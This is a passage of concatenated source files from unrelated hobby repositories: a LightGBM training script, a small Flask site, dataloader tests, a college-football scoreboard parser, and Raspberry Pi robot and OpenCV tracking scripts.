#'max_depth' : -1, #default = -1, no limit 'max_bin' : 500, #default = 255 #'num_leaves' : 15, #Default = 31 #XGBoost behav = 2^depth - 1 'boosting' : 'gbdt', #Default = gdbt 'metric' : 'rmse', 'num_threads' : -1, 'force_col_wise': True, #'use_missing' : False, #default = True 'learning_rate' : 0.08, #default = 0.1 #'feature_fraction' : 0.75, #'lambda_l1' : 0, #default = 0 #'lambda_l2' : 0, #Default = 0 'cat_smooth' : 150, #Default = 10 'cat_l2': 300, #default = 10 'min_data_per_group' : 150, #default = 100 'max_cat_threshold' : 200, #default = 32 'min_data_in_leaf' : 10, #default = 20 #'extra_trees' : True, #default = False #'subsample' : 1.0, #Default = 1 #'colsample_bytree' : 0.5, #'bagging_fraction' : 0.75, #Default = 1, used to deal with overfitting #'bagging_freq' : 100, #Default = 0, used to deal with overfitting in conjunction with bagging_fraction. #'path_smooth' : 150, } #This links to neptune.ai to monitor the training of the model. #Go to this link to the see the experiment: https://ui.neptune.ai/clljos001/CCLDP neptune.create_experiment(name="CCL_DP", tags=['Desktop', 'Example_Code'], params=p) trial_reg = lgb.train( params = p, #Parameter dictionary train_set = train, #Train set created earlier num_boost_round=20000, #How many rounds to train for unless early stopping is reached valid_sets = [val], #Set to validate on valid_names = ['Validation'], feature_name = 'auto', categorical_feature = 'auto', early_stopping_rounds = 150, #If not performance improvements for 150 rounds then stop. verbose_eval = 50, #Tell us how the training is doing every 50 rounds. ) #Save the model we just trained trial_reg.save_model('LightGBM_Model') ###Performance Metrics & Logging to Neptune.ai### test_pred = trial_reg.predict(X_test) r2_test = r2_score(y_test,test_pred) neptune.log_metric('Test R2', r2_test) val_pred = trial_reg.predict(X_val) r2_val = r2_score(y_val,val_pred) neptune.log_metric('Validation R2', r2_val) train_pred = trial_reg.predict(X_train) r2_train = r2_score(y_train, train_pred) neptune.log_metric('Train R2', r2_train) print('R2 for Test: ', r2_test, '\nR2 for Validation: ', r2_val, '\nR2 for Train: ', r2_train) rmse_test = math.sqrt(mse(y_test, test_pred)) print("RMSE for Test: ", rmse_test) neptune.log_metric('test rmse', rmse_test) rmse_train = math.sqrt(mse(y_train, train_pred)) print("RMSE for Train: ", rmse_train) neptune.log_metric('Test rmse', rmse_train) #Close the neptune uplink neptune.stop() #Print the model's feature importance excluding drug_name and drug_target print(Model_Explore(trial_reg)) ```
{ "source": "joshcurll/website", "score": 3 }
#### File: website/web/app.py ```python from datetime import datetime from flask import Flask from flask import render_template from flask_sqlalchemy import SQLAlchemy app = Flask(__name__) # using sqlite for testing app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db' db = SQLAlchemy(app) # this class along with any others should be in seperate files class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(20), unique=True, nullable=False) email = db.Column(db.String(50), unique=True, nullable=False) image_file = db.Column(db.String(20), nullable=False, default='default.jpg') # obviously we will want to move this to another table password = db.Column(db.String(100), nullable=False) posts = db.relationship('Post', backref='author', lazy=True) def __repr__(self): return f"User('{self.username}', '{self.email}', '{self.image_file}')" class Post(db.Model): id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(100), nullable=False) date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow) content = db.Column(db.Text, nullable=False) user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False) def __repr__(self): return f"Post('{self.title}', '{self.date_posted}')" announcements = [{ 'title': 'First Announcement', 'date_posted': '11 July 2018', 'content': 'First Announcement Posted for Testing' }, { 'title': 'Second Announcement', 'date_posted': '12 July 2018', 'content': 'Second Announcement Posted.' }] @app.route('/') def index_page(): return render_template('index.html', announcements=announcements) @app.route('/about') def about(): return render_template('about.html') @app.route('/hello/') @app.route('/hello/<name>') def hello(name=None): return render_template('hello.html', name=name) @app.route('/members') def members(): return render_template('members.html') @app.route('/projects/') def projects(): return render_template('projects.html') @app.route('/login') def login_page(): return render_template('login-page.html') if __name__ == '__main__': app.run(host='0.0.0.0', debug=True) ```
{ "source": "joshcurtis/aiodataloader", "score": 2 }
#### File: joshcurtis/aiodataloader/test_aiodataloader.py ```python import pytest from asyncio import gather from functools import partial from pytest import raises from aiodataloader import DataLoader pytestmark = pytest.mark.asyncio async def do_test(): return True def id_loader(**options): load_calls = [] async def default_resolve(x): return x resolve = options.pop('resolve', default_resolve) async def fn(keys): load_calls.append(keys) return await resolve(keys) # return keys identity_loader = DataLoader(fn, **options) return identity_loader, load_calls async def test_build_a_simple_data_loader(): async def call_fn(keys): return keys identity_loader = DataLoader(call_fn) promise1 = identity_loader.load(1) value1 = await promise1 assert value1 == 1 async def test_can_build_a_data_loader_from_a_partial(): value_map = {1: 'one'} async def call_fn(context, keys): return [context.get(key) for key in keys] partial_fn = partial(call_fn, value_map) identity_loader = DataLoader(partial_fn) promise1 = identity_loader.load(1) value1 = await promise1 assert value1 == 'one' async def test_supports_loading_multiple_keys_in_one_call(): async def call_fn(keys): return keys identity_loader = DataLoader(call_fn) promise_all = identity_loader.load_many([1, 2]) values = await promise_all assert values == [1, 2] promise_all = identity_loader.load_many([]) values = await promise_all assert values == [] async def test_batches_multiple_requests(): identity_loader, load_calls = id_loader() promise1 = identity_loader.load(1) promise2 = identity_loader.load(2) p = gather(promise1, promise2) value1, value2 = await p assert value1 == 1 assert value2 == 2 assert load_calls == [[1, 2]] async def test_batches_multiple_requests_with_max_batch_sizes(): identity_loader, load_calls = id_loader(max_batch_size=2) promise1 = identity_loader.load(1) promise2 = identity_loader.load(2) promise3 = identity_loader.load(3) p = gather(promise1, promise2, promise3) value1, value2, value3 = await p assert value1 == 1 assert value2 == 2 assert value3 == 3 assert load_calls == [[1, 2], [3]] async def test_coalesces_identical_requests(): identity_loader, load_calls = id_loader() promise1 = identity_loader.load(1) promise2 = identity_loader.load(1) assert promise1 == promise2 p = gather(promise1, promise2) value1, value2 = await p assert value1 == 1 assert value2 == 1 assert load_calls == [[1]] async def test_caches_repeated_requests(): identity_loader, load_calls = id_loader() a, b = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a == 'A' assert b == 'B' assert load_calls == [['A', 'B']] a2, c = await gather( identity_loader.load('A'), identity_loader.load('C') ) assert a2 == 'A' assert c == 'C' assert load_calls == [['A', 'B'], ['C']] a3, b2, c2 = await gather( identity_loader.load('A'), identity_loader.load('B'), identity_loader.load('C') ) assert a3 == 'A' assert b2 == 'B' assert c2 == 'C' assert load_calls == [['A', 'B'], ['C']] async def test_clears_single_value_in_loader(): identity_loader, load_calls = id_loader() a, b = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a == 'A' assert b == 'B' assert load_calls == [['A', 'B']] identity_loader.clear('A') a2, b2 = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a2 == 'A' assert b2 == 'B' assert load_calls == [['A', 'B'], ['A']] async def test_clears_all_values_in_loader(): identity_loader, load_calls = id_loader() a, b = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a == 'A' assert b == 'B' assert load_calls == [['A', 'B']] identity_loader.clear_all() a2, b2 = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a2 == 'A' assert b2 == 'B' assert load_calls == [['A', 'B'], ['A', 'B']] async def test_allows_priming_the_cache(): identity_loader, load_calls = id_loader() identity_loader.prime('A', 'A') a, b = await gather( identity_loader.load('A'), identity_loader.load('B') ) assert a == 'A' assert b == 'B' assert load_calls == [['B']] async def test_does_not_prime_keys_that_already_exist(): identity_loader, load_calls = id_loader() identity_loader.prime('A', 'X') a1 = await identity_loader.load('A') b1 = await identity_loader.load('B') assert a1 == 'X' assert b1 == 'B' identity_loader.prime('A', 'Y') identity_loader.prime('B', 'Y') a2 = await identity_loader.load('A') b2 = await identity_loader.load('B') assert a2 == 'X' assert b2 == 'B' assert load_calls == [['B']] # # Represents Errors async def test_resolves_to_error_to_indicate_failure(): async def resolve(keys): mapped_keys = [ key if key % 2 == 0 else Exception("Odd: {}".format(key)) for key in keys ] return mapped_keys even_loader, load_calls = id_loader(resolve=resolve) with raises(Exception) as exc_info: await even_loader.load(1) assert str(exc_info.value) == "Odd: 1" value2 = await even_loader.load(2) assert value2 == 2 assert load_calls == [[1], [2]] async def test_can_represent_failures_and_successes_simultaneously(): async def resolve(keys): mapped_keys = [ key if key % 2 == 0 else Exception("Odd: {}".format(key)) for key in keys ] return mapped_keys even_loader, load_calls = id_loader(resolve=resolve) promise1 = even_loader.load(1) promise2 = even_loader.load(2) with raises(Exception) as exc_info: await promise1 assert str(exc_info.value) == "Odd: 1" value2 = await promise2 assert value2 == 2 assert load_calls == [[1, 2]] async def test_caches_failed_fetches(): async def resolve(keys): mapped_keys = [ Exception("Error: {}".format(key)) for key in keys ] return mapped_keys error_loader, load_calls = id_loader(resolve=resolve) with raises(Exception) as exc_info: await error_loader.load(1) assert str(exc_info.value) == "Error: 1" with raises(Exception) as exc_info: await error_loader.load(1) assert str(exc_info.value) == "Error: 1" assert load_calls == [[1]] async def test_caches_failed_fetches_2(): identity_loader, load_calls = id_loader() identity_loader.prime(1, Exception("Error: 1")) with raises(Exception) as exc_info: await identity_loader.load(1) assert load_calls == [] # It is resilient to job queue ordering async def test_batches_loads_occuring_within_promises(): identity_loader, load_calls = id_loader() async def load_b_1(): return await load_b_2() async def load_b_2(): return await identity_loader.load('B') values = await gather( identity_loader.load('A'), load_b_1() ) assert values == ['A', 'B'] assert load_calls == [['A', 'B']] async def test_catches_error_if_loader_resolver_fails(): exc = Exception("AOH!") def do_resolve(x): raise exc a_loader, a_load_calls = id_loader(resolve=do_resolve) with raises(Exception) as exc_info: await a_loader.load('A1') assert exc_info.value == exc async def test_can_call_a_loader_from_a_loader(): deep_loader, deep_load_calls = id_loader() a_loader, a_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys))) b_loader, b_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys))) a1, b1, a2, b2 = await gather( a_loader.load('A1'), b_loader.load('B1'), a_loader.load('A2'), b_loader.load('B2') ) assert a1 == 'A1' assert b1 == 'B1' assert a2 == 'A2' assert b2 == 'B2' assert a_load_calls == [['A1', 'A2']] assert b_load_calls == [['B1', 'B2']] assert deep_load_calls == [[('A1', 'A2'), ('B1', 'B2')]] async def test_dataloader_clear_with_missing_key_works(): async def do_resolve(x): return x a_loader, a_load_calls = id_loader(resolve=do_resolve) assert a_loader.clear('A1') == a_loader ```
{ "source": "joshcvt/icsMiddleman", "score": 2 }
#### File: joshcvt/icsMiddleman/app.py ```python from chalice import Chalice, Response from chalicelib.middleman import do_milb import icalendar app = Chalice(app_name='icsMiddleman') @app.route('/') def index(): return {'hello': 'world'} @app.route('/milb/{teamtoken}') def get_milb(teamtoken): return Response(body=do_milb(teamtoken), status_code=200, headers={'Content-Type': 'text/calendar'}) ```
{ "source": "joshcvt/resetter", "score": 3 }
#### File: resetter/chalicelib/ncaaf_espn.py ```python import urllib.request, urllib.error, urllib.parse, json, traceback, time from datetime import datetime, timedelta from .reset_lib import joinOr, sentenceCap, NoGameException, NoTeamException, toOrdinal from .ncaa_espn_lib import ncaaNickDict, displayOverrides, iaa, validFbSet SCOREBOARD_ROOT_URL = "http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard" # start with this to get weeks, then customize for this week and full scoreboard #http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard?week=4&groups=80&limit=388&1577314600 # global for caching __MOD = {} # cache time for scoreboard CACHE_INTERVAL = timedelta(minutes=1) def get_scoreboard(file=None,iaa=False,debug=False): """Get scoreboard from site, or from file if specified for testing.""" FBS_GROUPS = "80" FCS_GROUPS = "81" SB_FORMAT_TAIL = '?week=%s&groups=%s&limit=388&%s' if file: print ("Using scoreboard from file: " + file) with open(file) as f: sb = json.load(f) else: if debug: print("Root: " + SCOREBOARD_ROOT_URL) try: scoreboardWeekUrl = "unconstructed" with urllib.request.urlopen(SCOREBOARD_ROOT_URL) as fh: sb = json.load(fh) now = datetime.now() for week in sb['leagues'][0]['calendar'][0]['entries']: if datetime.strptime(week['endDate'],'%Y-%m-%dT%H:%MZ') > now: weekValue = week['value'] break # scoreboardWeekUrl = SCOREBOARD_ROOT_URL + "?week=" + str(weekValue) + "&groups=" + FBS_GROUPS + "&limit=388&" + now.timestamp().__str__() if iaa: scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FCS_GROUPS, now.timestamp().__str__()) else: scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FBS_GROUPS, now.timestamp().__str__()) if debug: print("URL: " + scoreboardWeekUrl) with urllib.request.urlopen(scoreboardWeekUrl) as fh: sb = json.load(fh) except urllib.error.HTTPError as e: if e.code == 404: raise NoGameException("Scoreboard HTTP 404. This probably means the season is over. Root = " + SCOREBOARD_ROOT_URL + ", week " + scoreboardWeekUrl + "\n") else: raise e except Exception as e: raise e finally: fh.close() return sb def find_game(sb,team): """Passed scoreboard dict and team string, get game.""" for event in sb['events']: if test_game(event,team): return event return None def test_game(game,team): """Broken out so we can test for all kinds of variations once we build the variation list.""" return (team.lower() in [game["competitions"][0]["competitors"][0]["team"]["location"].lower(), game["competitions"][0]["competitors"][1]["team"]["location"].lower(), game["competitions"][0]["competitors"][0]["team"]["displayName"].lower(), game["competitions"][0]["competitors"][1]["team"]["displayName"].lower(), game["competitions"][0]["competitors"][0]["team"]["abbreviation"].lower(), game["competitions"][0]["competitors"][1]["team"]["abbreviation"].lower()]) def game_loc(game): return "in " + game["competitions"][0]["venue"]["address"]["city"] # probably want to get stadium and city for neutral-site games def rank_name(team): #return # could also be displayName which is full name pref = team["team"]["location"] #if pref.lower() in displayOverrides: pref = displayOverrides[raw.lower()] if team["curatedRank"]['current'] == 99: return pref else: return "#" + str(team["curatedRank"]['current']) + " " + pref def scoreline(game): # flip home first if they're leading, otherwise away-first convention if it's tied t1 = game["competitions"][0]["competitors"][0] t2 = game["competitions"][0]["competitors"][1] if int(t1["score"]) > int(t2["score"]): gleader = t1 gtrailer = t2 else: gleader = t2 gtrailer = t1 return (rank_name(gleader) + " " + gleader["score"].strip() + ", " + rank_name(gtrailer) + " " + gtrailer["score"].strip()) def spaceday(game,sayToday=False): (now, utcnow) = (datetime.now(),datetime.utcnow()) utcdiff = (utcnow - now).seconds startLocal = datetime.strptime(game['competitions'][0]['startDate'], "%Y-%m-%dT%H:%MZ") - timedelta(seconds=utcdiff) if startLocal.date() == now.date(): if sayToday: return ' today' else: return '' else: return ' ' + startLocal.strftime("%A") def status(game): if game == None: return None statusnode = game["competitions"][0]["status"] if statusnode["type"]["name"] == "STATUS_FINAL": status = "Final " + game_loc(game) + ", " + scoreline(game) if statusnode["type"]["detail"].endswith("OT)"): status += statusnode["type"]["detail"].split("/")[1] status += "." elif statusnode["type"]["name"] == "STATUS_SCHEDULED": status = rank_name(game["competitions"][0]['competitors'][1]) + " plays " + rank_name(game["competitions"][0]['competitors'][0]) + " at " + game["status"]["type"]["shortDetail"].split(' - ')[1] + spaceday(game) + " " + game_loc(game) + "." else: status = scoreline(game) if statusnode["type"]["name"] == "STATUS_HALFTIME": status += " at halftime " elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS" and statusnode["type"]["detail"].endswith("OT"): status += " in " + statusnode["type"]["detail"] + " " elif (statusnode["type"]["name"] == "STATUS_END_PERIOD") or ((statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "0:00")): status += ", end of the " + toOrdinal(statusnode["period"]) + " quarter " elif (statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "15:00"): status += ", start of the " + toOrdinal(statusnode["period"]) + " quarter " elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS": status += ", " + statusnode["displayClock"].strip() + " to go in the " + toOrdinal(statusnode["period"]) + " quarter " else: # just dump it status += ", " + statusnode["type"]["name"] + ' ' status += game_loc(game) + "." if 0: if 1: pass elif game["gameState"] in ("cancelled","postponed"): status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " originally scheduled for" + spaceday(game,sayToday=True) + " " + game_loc(game) + " is " + game["gameState"] + "." elif game["gameState"] in ("delayed"): status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " " + game_loc(game) + " is " + game["gameState"] + "." return sentenceCap(status) def get(team,forceReload=False,debug=False,file=None): global __MOD tkey = team.lower().strip() if debug: print("tkey: " + tkey + ", ", end="") if (tkey in iaa) or (tkey in ncaaNickDict and ncaaNickDict[tkey] in iaa): # we're going to be lazy about caching and just always reload for I-AA games if debug: print ("I-AA load: ", end="") sb = get_scoreboard(iaa=True,debug=debug) elif tkey not in validFbSet: raise NoTeamException(tkey + " is not a valid team.") else: # main I-A schedule cycle if forceReload \ or ("ncaafsb" not in __MOD) \ or (("ncaafsbdt" in __MOD) and (datetime.utcnow() - __MOD["ncaafsbdt"] > CACHE_INTERVAL)) \ or (("ncaafsb" in __MOD) and (("ncaaffile" not in __MOD) or (file != __MOD["ncaaffile"]))): if debug: print ("fresh load: ", end="") __MOD["ncaaffile"] = file __MOD["ncaafsb"] = get_scoreboard(debug=debug,file=file) __MOD["ncaafsbdt"] = datetime.utcnow() else: if debug: print ("cached: ", end="") pass sb = __MOD["ncaafsb"] game = find_game(sb,team) if game: return status(game) elif (tkey in ncaaNickDict): if (ncaaNickDict[tkey].__class__ == list): return "For " + team + ", please choose " + joinOr(ncaaNickDict[tkey]) + "." else: game = find_game(sb,ncaaNickDict[tkey]) if game: return status(game) # fallthru ret = "No game this week for " + team if ret[-1] != ".": ret += "." raise NoGameException(ret) ```
{ "source": "joshdabosh/autopack", "score": 3 }
#### File: autopack/finished/phase-35-final.py ```python from picamera.array import PiRGBArray from picamera import PiCamera import RPi.GPIO as GPIO import cv2 import numpy as np import movements import time def find_pos(x): x_cent = 320 if x > x_cent: direction = 'right' else: direction = 'left' return direction def main(): robot = movements.robot() camera = PiCamera() camera.resolution = (640, 480) camera.framerate = 50 camera.hflip = True camera.vflip = True rawCapture = PiRGBArray(camera, size=(640, 480)) time.sleep(0.1) for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True): image = frame.array blur = cv2.GaussianBlur(image, (3,3), 0) lower = np.array([3,9,114], dtype="uint8") upper = np.array([43, 49, 154], dtype="uint8") thresh = cv2.inRange(blur, lower, upper) thresh2 = thresh.copy() image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE) max_area = 0 best_cent = 1 detected = False for cent in contours: area = cv2.contourArea(cent) if area > max_area: max_area = area best_cent = cent detected = True M = cv2.moments(best_cent) cx = int(M['m10']/M['m00']) cy = int(M['m01']/M['m00']) cv2.circle(blur,(cx,cy),10,(0,0,255), -1) cv2.imshow('Tracking', blur) direction = find_pos(cx) if detected == True: #print '{}'.format(direction) dist = int(robot.scan_for_obstacles()) if direction == 'left': if dist < 30: robot.left() else: robot.left_forward() else: if dist < 30: robot.right() else: robot.right_forward() else: #print 'nuttin' robot.pause() blah = cv2.waitKey(1) & 0xFF rawCapture.truncate(0) if blah == ord("q"): break if __name__ == '__main__': main() GPIO.cleanup() ``` #### File: autopack/open_cv/color-tracking.py ```python from picamera.array import PiRGBArray from picamera import PiCamera import time import cv2 import numpy as np # set the text font font = cv2.FONT_HERSHEY_SIMPLEX # set the center of the frame for x and y x_cent = 320 y_cent = 240 # determine the relative position the detected point is at to the camera def find_dir(x): if x > x_cent: direction = 'right' else: direction = 'left' return direction # initialize the camera and grab a reference to the raw camera capture camera = PiCamera() camera.resolution = (640, 480) camera.framerate = 50 camera.hflip = True rawCapture = PiRGBArray(camera, size=(640, 480)) # allow the camera to warmup time.sleep(0.1) # capture frames from the camera for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True): # grab the raw NumPy array representing the image, then initialize the timestamp # and occupied/unoccupied text image = frame.array blur = cv2.blur(image, (3,3)) #hsv to complicate things, or stick with BGR #hsv = cv2.cvtColor(blur,cv2.COLOR_BGR2HSV) #thresh = cv2.inRange(hsv,np.array((0, 200, 200)), np.array((20, 255, 255))) lower = np.array([3, 9, 114],dtype="uint8") upper = np.array([43, 49, 154], dtype="uint8") thresh = cv2.inRange(blur, lower, upper) thresh2 = thresh.copy() # find contours in the threshold image image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE) # finding contour with maximum area and store it as best_cnt max_area = 0 best_cnt = 1 for cnt in contours: area = cv2.contourArea(cnt) if area > max_area: max_area = area best_cnt = cnt # finding centroids of best_cnt and draw a circle there M = cv2.moments(best_cnt) cx,cy = int(M['m10']/M['m00']), int(M['m01']/M['m00']) cv2.circle(blur,(cx,cy),10,(0,0,255),-1) # draws a line to the object cv2.line(blur,(cx,cy),((cx-25),(cy-25)),(0,0,255), 2) # finds the relative direction direction = find_dir(cx) # displays the location of the detected color cv2.putText(blur, ('{0}'.format(direction)), ((cx-30), (cy-30)), font, 0.8, (0,255,0), 2, cv2.LINE_AA) # show the frame cv2.imshow("Frame", blur) #cv2.imshow('thresh',thresh2) key = cv2.waitKey(1) & 0xFF # clear the stream in preparation for the next frame rawCapture.truncate(0) # if the `q` key was pressed, break from the loop if key == ord("q"): break ``` #### File: autopack/phase-2/phase-2-1_11_2018.py ```python import RPi.GPIO as GPIO import curses import time global distance distance = 11 TRIG = 24 ECHO = 26 screen = curses.initscr() curses.noecho() curses.cbreak() screen.keypad(True) GPIO.setmode(GPIO.BOARD) GPIO.setup(7, GPIO.OUT) # motor 1, forward, top right GPIO.setup(11, GPIO.OUT) # motor 1, backward, top right GPIO.setup(13, GPIO.OUT) # motor 2, forward, top left GPIO.setup(15, GPIO.OUT) # motor 2, backward, top left GPIO.setup(12, GPIO.OUT) # motor 3, forward, bottom right GPIO.setup(16, GPIO.OUT) # motor 3, backward, bottom right GPIO.setup(18, GPIO.OUT) # motor 4, forward, botton left GPIO.setup(22, GPIO.OUT) # motor 4, backward, bottom left GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup GPIO.setup(ECHO, GPIO.IN) # echo input setup GPIO.output(7, False) # set everything to false at startup GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(TRIG, False) def forward(): screen.addstr(0,0, 'up ') GPIO.output(7, False) # makes sure that nothing else GPIO.output(11, False) # is running when this runs GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(7, True) GPIO.output(13, True) GPIO.output(12, True) GPIO.output(18, True) def backward(): screen.addstr(0,0,'down ') GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(11, True) GPIO.output(15, True) GPIO.output(16, True) GPIO.output(22, True) def left(): screen.addstr(0,0,'left ') GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(11, True) GPIO.output(16, True) #GPIO.output(13, True) GPIO.output(18, True) def right(): screen.addstr(0,0, 'right') GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(7, True) GPIO.output(15, True) #GPIO.output(12, True) GPIO.output(22, True) def stop(): screen.addstr(0,0,'stop ') GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) def backup(backTime): GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) GPIO.output(11, True) GPIO.output(15, True) GPIO.output(16, True) GPIO.output(22, True) time.sleep(backTime) GPIO.output(7, False) GPIO.output(11, False) GPIO.output(13, False) GPIO.output(15, False) GPIO.output(12, False) GPIO.output(16, False) GPIO.output(18, False) GPIO.output(22, False) def move(dist): if dist >= 10: char = screen.getch() if char == curses.KEY_UP: forward() elif char == curses.KEY_DOWN: backward() elif char == curses.KEY_LEFT: left() elif char == curses.KEY_RIGHT: right() elif char == 32 or char == 10: stop() else: backup(1) def scan_for_obstacles(): # tells the sensor to fire a burst of sound GPIO.output(TRIG, True) time.sleep(0.00001) GPIO.output(TRIG, False) if GPIO.input(ECHO) == 1: start = time.time() while GPIO.input(ECHO) == 1: if time.time() - start > 0.25: break else: pass stop = time.time() global distance distance = (stop-start) * 17000 else: global distance distance = 11 return distance def Main(): try: while True: dist2 = scan_for_obstacles() move(dist2) screen.addstr(5,0,str(dist2)) finally: # shut down cleanly curses.nocbreak(); screen.keypad(0); curses.echo() curses.endwin() GPIO.cleanup() if __name__ == '__main__': Main() ``` #### File: autopack/test_files/multi-threading_test.py ```python from threading import Thread import time def timer(name, delay, repeat): print "Timer: " + name + " Started" while repeat > 0: time.sleep(delay) print name + ": " + str(time.ctime(time.time())) repeat -= 1 print "Timer: " + name + " Completed" def Main(): t1 = Thread(target=timer, args=("Timer1", 1, 5)) t2 = Thread(target=timer, args=("Timer2", 2, 5)) t1.start() t2.start() print "main is done" if __name__ == '__main__': Main() ``` #### File: autopack/test_files/threading_while_scanning.py ```python import RPi.GPIO as GPIO import time from threading import Thread distances = [] TRIG = 24 ECHO = 26 GPIO.setmode(GPIO.BOARD) GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup GPIO.setup(ECHO, GPIO.IN) # echo input setup GPIO.output(TRIG, False) distances = [] def scan_for_obstacles(): GPIO.setmode(GPIO.BOARD) while True: GPIO.setmode(GPIO.BOARD) # tells the sensor to fire a burst of sound GPIO.output(TRIG, True) time.sleep(0.00001) GPIO.output(TRIG, False) while GPIO.input(ECHO) == 0: pass startTime = time.time() while GPIO.input(ECHO) == 1: pass stopTime = time.time() distance = (stopTime-startTime) * 17000 distances.append(distance) time.sleep(0.025) def move(): dist = distances[-1] if dist <= 10: print 'uh oh a-somebody toucha mah spagheett' def Main(): try: t1 = Thread(target = scan_for_obstacles) t1.start() t2 = Thread(target=move) t2.start() t2.join() print distances except KeyboardInterrupt: # shut down cleanly GPIO.cleanup() if __name__ == '__main__': Main() ``` #### File: autopack/test_files/voltage-divider.py ```python def divider(vin,vout,r1): r2 = ((vout)*(r1))/(vin-vout) return r2 vin = int(raw_input('vin: ')) vout = int(raw_input('vout: ')) r1 = int(raw_input('r1: ')) print divider(vin, vout, r1) ```
{ "source": "joshdabosh/dhbridge", "score": 3 }
#### File: bridge/nacre/hangouts.py ```python import hangups class Hangouts: def __init__(self, client): self.client = client async def start(self): self.users, self.conversations = await hangups.build_user_conversation_list(self.client) async def send(self, message, conversation, annotate=True, raw=False): if annotate: annotationType = 4 else: annotationType = 0 if raw: segments = [hangups.ChatMessageSegment(message)] else: segments = hangups.ChatMessageSegment.from_str(message) request = hangups.hangouts_pb2.SendChatMessageRequest( request_header=self.client.get_request_header(), event_request_header=conversation._get_event_request_header(), message_content=hangups.hangouts_pb2.MessageContent( segment=[segment.serialize() for segment in segments] ), annotation=[hangups.hangouts_pb2.EventAnnotation( type=annotationType )] ) await self.client.send_chat_message(request) def getConversation(self, cid=None, event=None): if event: cid = event.conversation_id.id return self.conversations.get(cid) def getUser(self, uid=None, event=None): if event: uid = event.sender_id.gaia_id return self.users.get_user(hangups.user.UserID(uid, uid)) async def getContact(self, username=None): userConvoList = await hangups.build_user_conversation_list(self.client) # Basically this lets you get a list of everyone in all your chats userList, convoList = userConvoList # This is just extracting data userList = userList.get_all() # Same as above matches = [] # Now we start looping through data for user in userList: if username in (user.full_name).lower(): matches.append(user) return matches async def getConvList(self): return self.conversations.get_all() async def getGroupChats(self): return [c for c in await self.getConvList() if len(c.users) > 2] def getConversation(self, cid=None, event=None): if event: cid = event.conversation_id.id return self.conversations.get(cid) ```
{ "source": "JoshData/crs-reports-website", "score": 3 }
#### File: JoshData/crs-reports-website/history_histogram.py ```python import datetime import json import glob # helper function to parse report dates import pytz us_eastern_tz = pytz.timezone('America/New_York') def parse_dt(s): dt = datetime.datetime.strptime(s, "%Y-%m-%dT%H:%M:%S") return us_eastern_tz.localize(dt) # Get the first and last version date of each report. reports = [] for fn in glob.glob("reports/reports/*.json"): with open(fn) as f: r = json.load(f) d1 = parse_dt(r["versions"][0]["date"]) d2 = parse_dt(r["versions"][-1]["date"]) reports.append((r["id"], d1, d2)) # Sort and output the longest duration reports. reports.sort(key = lambda r : r[2]-r[1]) for r, d1, d2 in reports[0:10]: print(r, (d1-d2).days/365.25, "years", d2.isoformat(), d1.isoformat()) # Output a histogram of difference from first to last date. factor = 365.25 from collections import defaultdict histogram = defaultdict(lambda : 0) for r, d1, d2 in reports: delta_days = (d1-d2).total_seconds() / (60*60*24) bin = int(delta_days/factor) histogram[bin] += 1 hist_max = max(histogram.values()) for delta_days, count in sorted(histogram.items()): print(str(delta_days).rjust(2), "#"*round(50*count/hist_max)) ```
{ "source": "JoshData/silk", "score": 2 }
